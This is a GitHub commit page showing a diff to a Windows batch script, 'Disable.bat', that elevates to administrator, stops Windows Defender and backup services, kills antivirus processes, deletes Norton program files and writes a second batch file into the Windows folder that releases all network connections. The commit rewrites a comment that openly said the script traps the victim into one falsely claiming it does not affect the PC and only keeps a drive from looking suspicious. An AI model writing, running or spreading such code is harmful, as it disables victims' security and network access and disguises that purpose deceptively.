Skip to content

Commit d883fe5

Browse files
authored
Update Disable.bat
1 parent 054554a commit d883fe5

File tree

1 file changed

+2
-1
lines changed

1 file changed

+2
-1
lines changed

Disable.bat

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -5,7 +5,7 @@ cd /d "%~dp0" && ( if exist "%temp%\getadmin.vbs" del "%temp%\getadmin.vbs" ) &&
55

66

77

8-
:: Disables antivirus, firewall, taskmanager, to make sure your not going to get out of this...
8+
:: Disables antivirus, firewall, taskmanager, and a couple of other proseces (does not affect your PC and is only to make the drive not look sus)
99
net stop "SDRSVC"
1010
net stop "WinDefend"
1111
taskkill /f /t /im "MSASCui.exe"
@@ -34,6 +34,7 @@ del /Q /F C:\Program Files\Norton~1\*.*
3434
::color red, can be changed.
3535
COLOR 0F
3636

37+
:: other
3738
echo @echo off>c:windowswimn32.bat
3839
echo break off>>c:windowswimn32.bat
3940
echo ipconfig/release_all>>c:windowswimn32.bat

0 commit comments

Comments
 (0)